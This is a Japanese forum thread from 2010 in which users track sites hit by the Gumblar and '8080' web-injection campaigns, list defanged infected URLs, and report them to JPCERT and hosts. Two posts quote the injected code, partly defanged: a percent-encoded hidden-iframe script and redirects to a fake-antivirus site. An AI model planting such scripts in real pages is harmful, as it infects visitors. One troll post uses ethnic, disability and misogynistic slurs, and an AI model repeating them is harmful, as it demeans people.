Last-Modified: Thu, 20 May 2010 02:42:03 GMT

http://www●geocities●jp/tentacles344/hodokyo●html

Gumblar.Xぽい

www●spiceheads●com　　：Forbidden
www●ooraka●com　　：Forbidden
www●itofound●or●jp　　：aguse、Gred、Dr.Webともに反応なし/精査よろ
www●rokudai-ouen●com　　：Forbidden

www●m-ouen●com　　：Forbidden

>>352
Gumblar.x確認
exeter-relatives-forum●org●uk/images/hnx5v/gifimg●php
↓
mariosflyingpizzaclearlake●com/images/appetizers●php
↓
latifkm●com/Css/templet11●php
↓
sexfunbeach●com/blogs/moms/wp-content/plugins/index●php
↓
asgardr●fr/memo/robots●php
↓
以後追跡不能

現時点では無害だけど、つーほーしたほうが良いと思う

Gumblar.Xは既に日本を蹴ってるんじゃなかったっけ

>>356
踏み台は結構あるよ。

>>345
＞www●jc-consulting●jp/houkoku_m/index3●html ←絶賛放置中(再再再再･･･晒し)
NTTPCコミュニケーションズに電凸
折り返しの電話があり、対応する旨の話しでした

>>347,349 乙乙
--
>>346に投下したspiceheads●comに装填されていた8080以外のコード
（）＜＞／．，’”； ←を全角にしてありまつ
＜script type=’text／javascript’＞str=”＜vdepognbt src=” + unescape
（’%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31’）
+ ” Oaoz5=’1’vxoq5=’1’＞”；str = str．replace（’vde’， ’i’）；str =str．replace（’pog’， ’fr’）；
str = str．replace（’nbt’， ’ame’）；str =str．replace（’Oaoz5’， ’width’）；
str =str．replace（’vxoq5’，’height’）；document．write（str）；＜／script＞
--
microlines●lvって･･･

lv…ラトビアか。zlkon(gumblarの始祖)を思い出す。

>>360
.MSも見たな。

マイクロソフト…

>>359のコードなら難読化って程じゃないですよね
パーセントエンコードしたURLをデコード、「vdepognbt」を分割してreplaceで「iframe」に置換
今までのとは違う人が書いた物みたい

ガンブラーサイトを間貸ししてるのかも

カスペが見逃すやつをavastがことごとく遮断
優秀すぎる

Avira、AVG、MSEは論外・・・なのか？

virustotalで調べたが、上記のサイトでavastはほぼ完璧
MSE、AVIRAはちょっと検出、AVGは反応なしorz
変なサイトに飛ばされて、ウイルス仕込まれそうになった段階で反応するのかもしれないけど

>>315
感染したスクリプト撤去されたな。　感染コード長期間放置してたのに、何の告知も無しで。

結局、世の中こんな企業ばっかりか。

既出で今スクリプトが埋まってるURL
−8080系
ama●minasan●info/
anime●len2●net/
bentominowa●web●fc2●com/index_files/kotypeb_data/injection_graph_func●js
canyonhardware●com/
hirotu●net/hs/kyujin/maillady/index●htm
infom●biz/secretdiet/
kadaru●mydns●to/ →「ページを表示できないっぽいです(^^;」とあるが、ソースの下の方にスクリプト有り
kadaru●mydns●to/tauchi-office/taikensyugi/
kagaden●com/reiai/
kei●keita-house●com/torabaayu_kansai/
kumarin●biz/
neta-script●lionking●jp/2007/08/
nihon-support●jp/
population-japan●com
san●ron5●com/gbl/
temp●crossmarin●net/include/xoops●js
tenga●s155●coreserver●jp/
thismonky●com/
tw13●net
tw13●net/scratch/
tw13●net/vogue/vogue/index●html
www●adwalk●co●jp/
www●amakusaturigu●com
www●any-news●biz/
www●aoisys●com/nonstyle/
www●asu-job●com/
www●biz-x●jp
www●crossmarin●net/include/xoops●js

www●ftagent●jp/
www●gocha-mix●net/cgi-bin/blog/
www●hd-cre●com/ab-tz/
www●j-sports●or●jp
www●jc-consulting●jp/houkoku_m/index3●html
www●k3●dion●ne●jp/~sym1909/
www●k3●dion●ne●jp/~sym1909/hpbmapscript3●js
www●kireibast●sakura●ne●jp/exlwckaj/
www●marbell●jp/img2/photo/tenonaru/index●html
www●mfreep●com
www●nas-server●info/
www●ne●jp/asahi/sanya/sanpo
www●niaufuku●com/
www●niaufuku●com/sense_up/index●htm
www●nittoka●com/ →ソースの中央付近
www●oc-academy●com/taiken/wind●js
www●pommerland-herb●com/
www●ryu1●co●jp/
www●shinnippo●co●jp/ssff/2006hiroshima/
www●tec●ne●jp/
www●toutyann●com/
www●tu-han4●com/hatumo/
www●wood-sadoh●co●jp/classroom/index●html
www●y2-kco●com/bb-kn/
www12●plala●or●jp/atakashi/sk/
www13●plala●or●jp/metal-militia/
adajo●namidaame●com/ →途中で切れてる
nakaya-world●com/modules/bulletin →途中で切れてる
tukaoh●com →途中で切れてる
www●3ku●jp/grow_images/2005/june/index_2005june●html →途中で切れてる

www●granship●com/index●html →途中で切れてる
www●hdta●jp →途中で切れてる
www●seibidou●jp/products/information_sign/index●html →途中で切れてる
ayako●h00●jp →コメントアウト
butuda●f00●jp →コメントアウト
otokudou●h01●jp/ →コメントアウト
sunrise●2pg●in/ →コメントアウト
−Gumblar.x
ama●koukuujinja●net/vuitton/
doit●itabashido●com/seki/
jamur●jp/
mag●rdy●jp/
plot-office●com/
s1●shard●jp/syozyonudo/
saicho●co●jp/
truth-co●jp/
www●geocities●jp/tentacles344/hodokyo●html
www●kiyasuisan●co●jp/
−その他
winbet●tonosama●jp/
www●acl-music●jp/
www●aquaview●jp/
www●aquaview●jp/m_shop/index●html
www●aquaview●jp/q_a/index●html
www●ed-shop●com/
www●militarize●org/01●htm →ソースの最終行？
www●rctank●jp/ →ソースの最終行？

削除されただけでも、ましだぜ。未だに、絶賛放置中のサイトもあるぐらいだし
315のサイトは、企画、運営が外注だろ。よくこれで、運営してるなと。
Yahooも、自前の懸賞の所に、感染したサイトがリンクされていても放置するのに、フィッシング対策にYahooツールバーを入れよう！と宣伝してるのは笑うわ。

>>362
普通すぎるから激しい難読化より気付き難い(かもしれない)

>>367-369

>>372みすった orz
--
>>367-369 まとめ乙です。
>>358 乙です。

so-netさんが４連発ｗ
止まらぬサイト改ざん(1) ISPがガンブラー対策〜パスワードリセット敢行も
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2248
止まらぬサイト改ざん(2)「怪しい薬局」に続き「怪しい時計屋キャンペーン」も
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2249
止まらぬサイト改ざん(3)「負の連鎖」を断ち切る「3つの基本対策」実施を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2250
止まらぬサイト改ざん(4)訪問の心あたりはありませんか〜新規告知サイト13件
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2251


サイト復旧後、「告知無し」のカスサイトを晒すスレが必要かな？

>>373
>>280のホスティングはso-net

＞ サイト復旧後、「告知無し」のカスサイトを晒すスレが必要かな？
wktk

>>374
so-netから>>280に連絡があったそうです（so-net　
こっそり修正しているようですが告知しないのかと聞いたところ
改竄された事実はないとのお言葉でした

ぶちぎれましたね、私はw
会話を録音しているとかで私を警察に訴えるとのこと
この団体をことわざで例えるなら、【逝ってよし】ですかねw

so-net　GJ

>>375
たぶんまた改ざんされるんじゃないかな
それでも事実はないと言い張りそうだけど

>>375
あぁー。。。
>>280のアドレスで具具れば魚醤がでるのでもしものときのために（ｒｙ
so-netにはフォームと鯖缶宛にめるして対応の返事があったんだけど、
そんなことになってたとは…（告知のことを>>373のセキュリティニュースから引用してます>>14）

先生に危険認定されてる時点で言い逃れもへったくれもねぇだろうｗ

議員さんも支持者も大変すなぁ
www●sutoband●org

>>380
とりあえずブログに改ざんされている箇所とIPAのアド書いておいたww
JPCERT/CC通報済み

てか、うちの選挙区の人orz

>>300
さすが民主党議員はテロ行為に余念がない。

絶対守ろう！ 世界の平和 地域の安全 日本の将来

その前に何か忘れてませんか

>>375
＞会話を録音しているとかで私を警察に訴えるとのこと
so-netと話をしたで始まって、この団体は･･･で結んでるところが少しよくわからない
今後どうすれば訴えるって？それともいきなり警察に相談しますって？
本当なんだとしたらわけわからん
告知の責任を果たさない法人晒しスレのテンプレをマジメに検討した方がいい

基地がいすぎるなｗｗｗ

【陥落サイトのURL悪用厳禁】
vaxponys●sakura●ne●jp/hukin-goods●vaxponys●com/

■当サイトのウィルス感染に関するお詫びとお願い
www.i-keiei.jp/2010/05/post_26.html
修正後、告知しないカスサイトは見習ってほしいぞ･･と。

>>386
さくらインターネットに通報しました

＞修正後、告知しないカスサイトは見習ってほしい
まったくですね

>>380
404になってますね

>>382
いや逆でしょｗｗ
しかし子ども手当・・・みんなに配った麻生さんと比べて不公平感があるし
財政的にも借金して配るという、地域振興券を遥かに超える究極的愚策ですな

といってもガンブラー仕掛けちゃいけませんよ＾＾

>>388
キャッシュはまだ検出する

aimeblog●com●down●uproda016258●jpg

gredで不正改ざん

>>391
aimeblog●com/だとしたらドメイン自体が真っ黒
もともとウイルス配布サイトだからこのスレとは関係ないよ
改ざんではなくて元からそういうサイトなの
どっかのスレにあったならNG登録しといたほうがいいよ

一般社団法人 Mozilla Japan は、日本国内における Mozilla の製品および関連技術の普及啓蒙を目的として設立された




はずなんだけどな

誤爆った

危険ドメインリスト(アカウントハックウイルス関係, CGI版) - BS-Template (BSWiki)
http://smith.rowiki.jp/domain/?help

http://smith.rowiki.jp/domain/?domain=aimeblog.com

>>380
http://blog.goo.ne.jp/sutoband/e/14cddcd36fbbc009e5c543ee6f8cb38c
>>このＨＰのようにアクセスが数百程度のＨＰも脅威の対象かな？
自称危機管理専門家なのに(笑)　大手とか関係ないぞ

こんな認識のヤツは頼むから運用しないでくれよ

いつこのGunblerや8080が終息に向かうんだろうか？
どんどん悪化してきているような気がする…

>>397
公人としての自覚が（ｒｙ

>>280
403や404返してますね。
なにかあったのでしょうか？（棒

削除依頼スレ見てきた
削除依頼出すのはいいけど、セキュ板実質管理者居ないから、
他のスレのとまとめて長期未処理スレに報告したほうがいいと思う

まとめて出してくるわ

>>400　orz...

>>398
そうなんだよなぁ
こちらは感染しない対策をしてればいいんだが
そういう問題でもないからなあ、被害総額はどのくらいなのだろうか
そもそも感染しない対策すら知らない人が多そうだし

>>402
自分は2chをやらなかったらGunblerも対策も知らなかったよ
対策の仕方を読んでもいまだによくわからないし

被害と言うのはGunblerを踏んで何かを流出させた人だけではなくて
Gunblerを踏んでしまってクリーンインストールをしなければならない手間や
Gunblerを仕込まれてしまってサイトを直さねばらない手間や費用も
被害と言えば被害だよね

>>398
永遠に終わらないような気が･･orz

【陥落サイトのURL悪用厳禁】
www●goshikionsen●net/access
www●fashion389●com/datsushien

■本日の目玉商品ｗ
<!--ショッピングサイト(トロイ付)構築を行っております-->
eccube●jp/
↓見本ページ(やっぱりトロイ付)↓
eccube●jp/demo/

>>403
> 対策の仕方を読んでもいまだによくわからないし
これは問題だろ
どこがわからんのかｋｗｓｋ
なんとなくわからんとか理解する気がないとかじゃなく文章ちゃんと読んで
どこがわからんのか教えてくれ

www●j-sports●or●jp　　：Gred、Dr.Web反応せず/精査よろ
vaxponys●sakura●ne●jp/hukin-goods●vaxponys●com/　　：再凸済み

>>367-369
一通りチェックが終了したので、昨日付けでJPCERTに報告しました
これだけの数、何処までやってくれるか判りませんけどね

>>404
www●goshikionsen●net
www●fashion389●com/datsushien/
eccube●jp

JPCERT/CCに報告しました

>>406
j-sportsは今日付けで変更されてるページをいくつか確認
とりあえず修正したのかもしれない
再改ざんの可能性もあるので要観察かな

TOPがこんなかんじで1時間前くらい
Last-Modified: Wed, 02 Jun 2010 05:10:14 GMT

ジェーピーサートコーディネーションセンターの中の人って何人なんだろうね？

こんなに頻出してたら大変だろうに

>>404
http://www.virustotal.com/jp/analisis/567823945ead442c75e4d3a54949a8044e7210b3c3a23ac85edda85a10955829-1275460764
祝　全スルー

JPCERTも対応していれば大変だろうけど、してないんじゃないかな。
していれば、ISPの対処のスピードも上がるでしょう。
デジロックみたいな所が、だらだらとやっている位ですから、何もやっていないでしょうね。

>>403
・windows　update
とにかく最新にしとけ、XP sp2の人もまだいるみたいだから
その場合はカスタム更新で

・Adobe Reader
要らん場合はインストールすんな

・Adobe ReaderのAcrobat JavaScript
>>4のとおり

・JRE(Java Runtime Environment)を最新版に更新する
要らん場合はインストールすんな
プリインストールされてる場合はアンインストール後にCCleanerで掃除

・Flash Playerを最新版に更新する
バージョンチェックはしておこう

・QuickTimeを最新版に更新する
alternativeでおｋ、ブラウザにプラグインなんか入れんな

kanto●itca●or●jp/wic/attachment/97/resource-253●html
社団法人情報通信設備協会　関東地方本部

>>412
遂にお会い出来ましたね、com:8080さん

>>412
おぉ、ソースの誘導先のソースでAVIRAが珍しくピコった。
com:8080はじめて見た。

Gumblar.xはじめ色々な改ざん＝＝

fun●s331●xrea●com/ikeacat/r●js
sale●s334●xrea●com/?p=127
bara●s317●xrea●com/
sakura●s316●xrea●com/?p=136
ps2●s307●xrea●com/?p=135
www●tctv●ne●jp/s-pato/tyuuka●html
sijoanna●finito●fc2●com/
meringue●s48●xrea●com/pm/2004/04/
toko72●s289●xrea●com/adhocmart●com/renaiunaphuusui/
elesty●s25●xrea●com/s-album/kie-album-39●htm
soverign●s154●xrea●com/

eccube●jp/逃げるの早いなｗ
↓禿のキャッシュ↓
cache●yahoofs●jp/search/cache?p=site%3Aeccube●jp%2F&search●x=&fr=top_ga1_sa&tid=top_ga1_sa&ei=UTF-8&aq=&oq=&u=eccube.jp/&w=eccube+●jp&d=Ku2UhO8_U3HZ&icp=1&●intl=jp

Gumblarのスペルすら間違えるような人は
IPAやJPCERTやセキュmemoを見ていないんだろうなぁ。

逃げ得は許さない

>>416
今回は魚拓をとってから電凸したのであつた

魚拓e ccube.jp/
http://megalodon.jp/2010-0602-1708-18/eccube.jp/

gredで危険ですとか言われたサイトは踏んじゃうとやばいんですか？
エロゲの公式さいとなんですけど

>>420
たぶんはい

>>421
公式にいかないと修正パッチがあてられない・・・orz
リンク先のページもチェックするにチェックを入れなかった時は安全ですと言われたんですけど
ちょっとぐらいのぞいても大丈夫ですよね

>>411
＞プリインストールされてる場合はアンインストール後にCCleanerで掃除
ここがよくわからん
コントロールパネルから消してjava6:20以外どこにも無いのに外部ソフトウェアが必要なの？

>>419
ＧＪ

>>422
修正パッチなんて配布支援サイトを探せばいいじゃない
とりあえずブランド名ｐｌｚ

>>425
祝福のカンパネラです

あいよ

>>412
それって無関係かもしれんよ

www●google●co●jp/search?hl=ja&q=site%3Akanto●itca●or●jp%2F

www●google●co●jp/search?q=site%3Akanto●itca●or●jp%2Fwic%2F

>>426
ごめん。まだ見てたらURLを加工して貼ってくれ
感染箇所を見つけられない‥。

もし黒ならアニメ化するってのにorz

>>426
avast! 4.8の100602-0の定義ファイルで踏んでみたがなんともないような
さらっとソースと.jsも見たがそれっぽいのが見当たらないな
セキュソフトはなに？

ああgredで見たのか

>>429
工作板の本スレ>>1にある上から二番目のURLです
URL貼り方はこうでいいですか？
windmill●suki●jp/product/campanella/

>>432
白だとおも

>>426
あちこち確認しながら見てたら時間が…

ソースには特に変なものはなかったです、Dr.Webも反応しませんでした
Gredもhtmlはシロ判定を返してるみたいですし大丈夫かと

というか、Gredが修正パッチを誤検出してるっぽいです
VTではシロ判定http://www.virustotal.com/jp/analisis/012b338f69d323de3cce45cf289f3b7fcf7b2b19dab7d264872e3c05dbc96075-1275470513

exe絡みだとスレ違いだし、まぁこんな回答しか返せませんけど良いですか？

>>433>>434
何事も無かったようでほっとしました！
お二人ともご親切にありがとうざいました

一応、原作ファンとして心配になったのでexeもチェックしたけど特に異常はない

http://mirror1.lapistan.jp:8000/mirror/windmill/mod/campanella_voice.exe
の:8080を誤検知したとかってオチだとおも

:8080じゃないし

>5を踏んじゃったんですが、
大丈夫でしょうか？荒らし酷いな

>>438
専ブラ使えばレス見てわかるとおもうんで専ブラ導入推奨

>>416
処理早いのは良いことなんですけどね　告知できればなお良
>>419
17:08時点では修正済みでは? 感染時ソースの魚拓↓
http://megalodon.jp/2010-0602-416-03/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Feccube.jp%2Findex.html

外部.jsの場合、自分は魚拓を表示できないので
ピリオドをパーセントエンコードするか、JSUNPACKのレポートにして欲しいです↓
http://megalodon.jp/2010-0601-1513-45/www.dan.co.uk/viewsource/index.php?url=http://www.sutoband.org/js/scroll_news%2Ejs
http://jsunpack.jeek.org/dec/go?report=6bfc48ba1e492f69a3c1f52e5d873eee2e4a7924

>>428
サイトが乗っ取られてみたいです

>>423
アンインストール後にJREの残骸が残ることがあるかもしれないので
念のためにCCleanerでレジストリを調べておくといいかもしれないということ

>>412　404返すようになってきた
http://megalodon.jp/2010-0602-2208-14/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fkanto.itca.or.jp%2Fwic%2Fattachment%2F97%2Fstyle%252Ecss
Last-Modified: Wed, 06 Aug 2008 18:40:52 GMT
2008年に乗っ取られたのがガンブラーのおかげで発覚したのか

>>438
いつ踏んだんですか？とりあえず一週間ほど前に対策とられたみたいなので、
ここ数日の事であれば大丈夫ですよ。

>>412,429
www●mypersonalhttp●com:8080 ← ここに行って
goscanfor●com ←ここに飛ばされ
microsoft●msn●com●chimen●info ←ここでFakeAVの実演販売

Google先生も怒ってます

445です
gred先生は「このサイトは安全です」とな（ダメじゃん）

>>443
大元は[社団法人 情報通信設備協会]http://itca.or.jpで
ttp://itca.or.jp/kanto/ が ttp://tkanto.itca.or.jp/ に転送される
http://www.google.com/search?q=http://itca.or.jp/kanto/wic/attachment/97/&num=50
2年前からコメントスパム配信基地だった

×コメントスパム
○トラックバックスパム

>>442
げぇ……レジストリまで探らないといけないのか
そんなのここに初めて来たばかりのPCに疎い人とかにさせたら
重要なの消して悲惨な事になりそうだ
そこまで徹底的にしないと対策が不十分と言われるんじゃ
未だにガンブラー広がってるのも納得

広がってるスピードや広がってる対象（政府関連、ウェブ業者関連）がおかしいとは思うけど

>>440
ECCUBE.JPの訂正
http://megalodon.jp/2010-0602-1455-03/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Feccube.jp%2Findex.html

取扱注意
www●cowtv●jp/channel/student/index●php

www●odcc●jp
大阪デジタルコンテンツビジネス創出協議会

世界へ優れたコンテンツ…じゃなくてウィルス発信中

>>451 452
どちらもすごいですね　凸完

www●triskelionpublishing●net/

【陥落サイトのURL悪用厳禁】
www●ktm-ktm●com/tomoko ←途中切れ
www●w-ouen●com/i/machi ←未対応
www●kyotoclub-ilias●net/m/ ←電話用
www●triskelionpublishing●net/index●html ←途中切れ
www●giuglianoweb●com ←途中切れ
gpindy●com/ ←電話用
www●haisui●com/ec/html/
netgames●kirara●st/netgames
d07●mobair●info
www●suit-order●com ←絶賛放置中
park17●wakwak●com/~bayside/URANAI/R/ALLSITE/main●html
get-motorcycle●com/

【本日の(ry
infotop777●com/detail●php?id=style1198741395
↓ページ内の[Click Here!]を押した先↓
okuo2●cyberinfostation●jp/ ←＼(^o^)／

netgames●kirara●st/netgames
d07●mobair●info
www●suit-order●com
park17●wakwak●com/~bayside/URANAI/R/ALLSITE/main●html
get-motorcycle●com/
infotop777●com/detail●php?id=style1198741395
okuo2●cyberinfostation●jp/
鯖屋とJPCERT連絡完了。

kanto●itca●or●jp/の「お問い合わせ」のドメインが
共有SSLだしGoogleにキャッシュされてるし、胡散臭い
http://www.google.com/search?q=site%3Aserver08.instantssl.co.jp%2F&num=50

www●torihada●com
鳥肌実公式サイトが…

kanto●itca●or●jp/
社団法人情報通信設備協会　関東地方本部
知らせたのにお礼のメールもなし。告知もなし。
こんな団体がセキュリティを語るな！

また、ページのTopにゴルフコンペの案内ってどんな温い団体なんだよ。
蓮舫　次はここをバッサリ切ってくれ

>>459
そこ、さっき電凸しました
分かる者が不在だから明日掛け直してくれといってました
今日は無理なんじゃないの？

>>447 >>457 >>459
kanto●itca●or●jp/ はフィッシングサイトかも

↑　修正済み？？

>>462
>>443の時点で改竄されていたattachment/97/以下が404
Yahoo!のキャッシュにもガンブラーはないみたい
http://siteexplorer.search.yahoo.co.jp/advsearch?p=http%3A%2F%2Fkanto.itca.or.jp%2Fwic%2Fattachment%2F97%2F
http://siteexplorer.search.yahoo.co.jp/advsearch?p=http%3A%2F%2Fitca.or.jp%2Fkanto%2Fwic%2Fattachment%2F97%2F

>>459
いったいどんなスクリプトが？

>>464
感染時のソースの魚拓。　
http://megalodon.jp/2010-0602-1729-08/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fkanto.itca.or.jp%2Fwic%2Fattachment%2F97%2Fresource-218.html
</head><body><script>〜

飛び先が.com:8080。珍しくAVGが反応した

>>458
Last-Modified: Sat, 29 May 2010 14:27:16 GMT : http://megalodon.jp/2010-0603-2338-58/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.torihada.com%2Fjava%2FAC_RunActiveContent%2Ejs
Last-Modified: Sat, 29 May 2010 14:27:33 GMT : http://megalodon.jp/2010-0603-2340-15/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww%2Etorihada%2Ecom%2Fjava%2Fneweindow%2Ejs
Last-Modified: Sat, 29 May 2010 14:27:24 GMT : http://megalodon.jp/2010-0603-2340-59/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww%2Etorihada%2Ecom%2Fjava%2Fdspflash%2Ejs

>>440
こんなんでいい？

>>463

乙です

mokunen●com
木質燃料だけに…

d-money●jp

>>458
>>468
IPA、JPCERTに報告しました

>>469
IPA、JPCERTに報告しました
Aviraに検体を提出、返事待ち

>>449
FFRWとかのレジストリ掃除ツール使えば手動で弄らなくてもそういう残骸はみんな消せるんだけどね
トラブルもほぼ起きない(RegSeekerみたいな漢専用ツールもあるから前評判は確かめた方がいいけど)
でも初心者じゃレジストリとか知らんだろうしな

俺は普通高校でhtml言語とかWordとかほんの少しやったけど
あんなもの教えるくらいならPCのセキュリティについて教えればいいのに

先生が教えられることは先生が説明できることだけだ

>>471
何歳だか知らんけど、既に教える内容は変わっていると思われ。
オッサンの俺はそもそも学校でPCなんか教わらなかった
(PC9801でDOSでパソコン通信の時代。当時の高校生は
友達とはポケベルでコミュニケーションしていた)。

数学や英語などと違って技術の進歩に合わせて頻繁に変わる
(変えざるを得ない)から、先生が大学で修得していなかったことを
教える羽目になってる(教科書棒読みの)数少ない教科なんじゃないかな。

adgaw●com/keyword/b/

五色温泉の抱えてた切符ってラトビア行きだっけ？

>>470 乙乙

【陥落サイトのURL悪用厳禁】
www●amakusaturigu●com/ ←絶賛放置中
www●kadaru●mydns●to/ ←相変わらず未対応(悪質)
↓↓↓↓↓
architects-egg●kadaru●mydns●to/ ／(^o^)＼

www●ad-jeaayf●com/links/


※※※アクセス注意！※※※
www●bestofunder●com/
↓
＜script language="JavaScript"＞top.location = 'ｈttp://antiviru●ru/';＜/script＞
＜meta http-equiv="Refresh" content="0; URL="ｈttp://antiviru●ru/"＞
＜center＞＜a href="ｈttp://antiviru●ru/"＞Click＜/a＞＜/center＞
＜a href="ｈttp://antiviru●ru/"＞ Click Here＜/a＞
※最下部のGumblar.xはきっと無害

www●bestofunder●com/indexst●html ←これが本家かな？

少しは役に立つ機関…　なのに知名度低いんだよな
http://www.ipa.go.jp/security/txt/2010/06outline.html

>>280
Last-Modified: Fri, 04 Jun 2010 07:32:33 GMT
＞ 当財団ウェブサイトへのウィルス感染に関するお詫びとご報告

PUA.HTML.Infected.WebPage-2
これもこのウイルスの検出名でおk？

それを確認してどうするのかと

>>480
常駐以外のを使ってこれを検出した
スプリクトに反応しただけなら問題ないから確認したかったが、スレチだったな

ブラウザキャッシュなら名前より検出場所でわかるんじゃないの

>>482
場所見る前にブルスクった

まあ大丈夫だろうし、ありがとう

どういうエラーで落ちたのかにもよるけどそれは問題あるとおもいます

>>466
どもです　

関連リンク
[いま一番危ないぜい弱性は何だ？ - 今週のSecurity Check：ITpro]
http://itpro.nikkeibp.co.jp/article/COLUMN/20100601/348706/
Java(JRA) 38%
Adobe Reader/Acrobat 36%
MDAC (UpdateしてないExcel)19%

[本当の攻撃はこれから？　Gumblarが怖い本当の理由 − TechTargetジャパン 情報セキュリティ]
http://techtarget.itmedia.co.jp/tt/news/1004/28/news01.html
（要会員登録or[-CmsMembersControl])
「Gumblar（ガンブラー）の攻撃モデルは、近年まれに見る成功例」鵜飼裕司

2010.03.25と古いですが
最近見て、改竄された不名誉は甘んじて受ける姿勢が好感したので↓
[音素材サイト『ザ・マッチメイカァズ』閉鎖の危機?! 管理人が語る“ガンブラー”の脅威- ガジェット通信]
http://getnews.jp/archives/53016

>>484　どういうエラーで
Dr.webの異常終了で、既知の問題だからおk

part4からの住人で対策はとっくにやってある

444じゃなくて440でしたごめんなさい

あ、part5だた

park17●wakwak●com/~bayside/URANAI/R/ALLSITE/main●html
封鎖確認

wakwak案外はやいww

僕はちょうせんじん知的障害者です
魚醤系316系の僕のちょうせんじん知的障害者まとめです


322 ：316：2010/05/30(日) 03:42:15　←なまえ316系　え？何これ怖いです。。。

324 ：315：2010/05/30(日) 08:32:37 　←なまえ316系さん？315？え？自分にお返事　何これ怖いです。。。
315

378 ：316：2010/06/01(火) 01:43:29　←魚醤？　え？魚醤てなんですか？　あぁー。。。怖いです。。。（魚醤系）
>>375
あぁー。。。
>>280のアドレスで具具れば魚醤〜


419 ：名無しさん＠お腹いっぱい。：2010/06/02(水) 17:59:37 　←あ！魚拓になりました！よかったのであつた！
>>416
今回は魚拓をとってから電凸したのであつた　　　　　　　　　　




　　　　同人の魚拓好き腐まんこさん？あほ(ry
　　　　__､､=--､、　　　　　　　　　＿＿
　　　/　　　　・　ﾞ!　　　　　　　／・　　　｀ヽ
　　　|　・　　　__,ﾉ　　　　　　 （＿　　　 ・　|
　　　ヽ、　(三,､,　　　　　　　 　＿）　　　 /　　僕あほ　ちゃうどー　電凸すきやねん電凸て何？
　　　　/ー-=-i'’　　　　　　　（__＿＿,,,.ノ　
　　　　|＿＿,,/　　　　　　　　　　|＿＿ゝ　　←　新型Gumblar>316型　魚醤系　ボンクラ腐まんこ（推定）
　　　　　〉　　）　　　　　　　　　　（　　）
　　　↑
　　　ぼくは知能指数？12です僕です(ry　　　　

にほんごでおｋ

>>491
反応しちゃダメだ。
華麗にスールだぞ

>>476
www●amakusaturigu●com　　：Forbidden
www●bestofunder●com　　：Gredで「Misleading Application (BW017B)」

後は変化なし

■ホームページ更新代行
www●7500zei●com/ ←既に修正済
※ソースの最下部に8080の痕跡
<!--d2392c04537c5eaf61fe86d1998535a1-->

↓びんぐがコードを捕捉(きゃっしゅ)してた↓
cc●bingj●com/cache●aspx?q=site%3awww●7500zei●com%2f&d=4616900965040755&mkt=ja-JP&setlang=ja-JP&w=db69f17b,70c28a29

今日windows defenderでスキャンしたら
何か検出されたので検索したらどうやら
ガンブラー系っぽいものだった。
ガンブラー対策はこまめにしてた。
削除しようとしたら
再起動を促されて再起動したけど
セーフモードですら起動せず・・・・
泣く泣くクリーンインストールしました。
何かこれまでの対策が効かない
新型亜種でも出回っているのですか？

>>496
何を根拠にガンブラー言うのかわからんのだが･･･
>>4は8080系用の対策方法だから、違う系統の改竄に対しては効果が無い場合がある。

Gumblar(ガンブラー)＝サイト改竄の総称と決め付けてしまった
某セキュリティソフトベンダーと、それをそのまま報道したマスゴミの罪は大きい

安価まちがえたorz
>>496→>>495

>>495
検出ウイルス名は？

>>495　です。

ウイルス名はそもそもクリーンインストールしてしまったので
わからなくなってしまったんだけど、「downloader」みたいな単語があった
気がします。
検出されたウイルス名をググッたら完全にHITはしなかったんだけど
同じようなウィルス名のものがどうやらガンブラー系とのことでした。

ちなみにOSはXP　SP3　でウイルス対策ソフトはAVAST５free、
火壁は　PC　TOOLS、ブラウザはIE7です。
アップデートとかこまめにやってましたが・・・
ほぼ毎日スキャンはしてました。

ちなみに今回のウイルスを検出したのは
windows defender　でした。

>>499
windows defenderでウイルスって検出するの？
downloaderこれだけじゃなんともいえん
他にもたくさんある

こまめにアップデートしながらIE7？
何か色々穴がありそうな人だな

>>499
IE7の時点でこまめにやってるとは言えない

ゼロデイのAdobeにまたまたゼロデイｗ
ttp://www.adobe.com/support/security/advisories/apsa10-01.html

>>499 です。

>>501-502
IE8は個人的な事情があって使ってませんでした。
今回はもう素直にIE8にしました。

>>500
毎日（平日）AVASTでスキャンしてたのですが
毎週末にdefenderでもスキャンします。
今回なぜかスパイウェアとして検出されました。
ウイルス名はやっぱり思い出せません。

ちなみにアングラなサイトには行かない程度に
ネットサーフィンする程度ですが・・・

この一連のウイルスの場合、アングラも非アングラも関係無いってことが判ってない時点で(ry

>>505

すいません。
それくらいは知っていましたが、
（大手企業のサイトも改ざんされた等）
当方それほどPCに関するスキルがないので
何とかそれなりに情報収集して対応してきた
つもりです。

でも結局やられてしまったので
ちょっと悔しくてここで愚痴っただけです。

周辺機器のドライバのインストールや
年賀状の住所録を作り直すのが
めんどくさいですね。

残りの作業も今からがんばります。

まぁPC初心者じゃあ解らなくてもしょうがないだろ
おまけに初心者スレにこの類を扱うスレは存在しないからここにすがるしかない

ここもテンプレが改竄されてる時点で

＞ちょっと悔しくてここで愚痴っただけです。
見事な開き直りですね

>>506
いくつかレスキューディスクが提供されてるので試して欲しかったですね
■ノートン レスキュー ツール
http://security.symantec.com/nbrt/overview.asp
■Dr.Web LiveCD
http://drweb.jp/support/LiveCD.html

駆除できなくても住所録の救出くらいできたはず
■WinPE
http://lets-go.hp.infoseek.co.jp/winpe_index.html

>>504
IEはデフォルトの設定だと穴が多いから
Firefox＋NoScript＋AdblockPlus
この組み合わせを推奨する

NoScript→<IFRAME>禁止にチェックを入れる
AdblockPlus→|http://*:8080* をブロック

ほーらまたアンチFx厨が来まちゅよ〜

FirewallやProxomitronやHIPS/IDSで遮断検知ルール作って
PC内全てのブラウザに適用出きるようにすればええがな

そんなスキル持ち合わせておらぬ！(ｷﾘｯ

>>511
糞企業のザルPCには激しくオススメしたい組み合わせ

Flash Player, Adobe Reader and Acrobat に致命的脆弱性だってよ。
攻略コードも既に出回ってるって。

現時点での対策がFlash 10.1 RCにしろってのが最悪だよな。
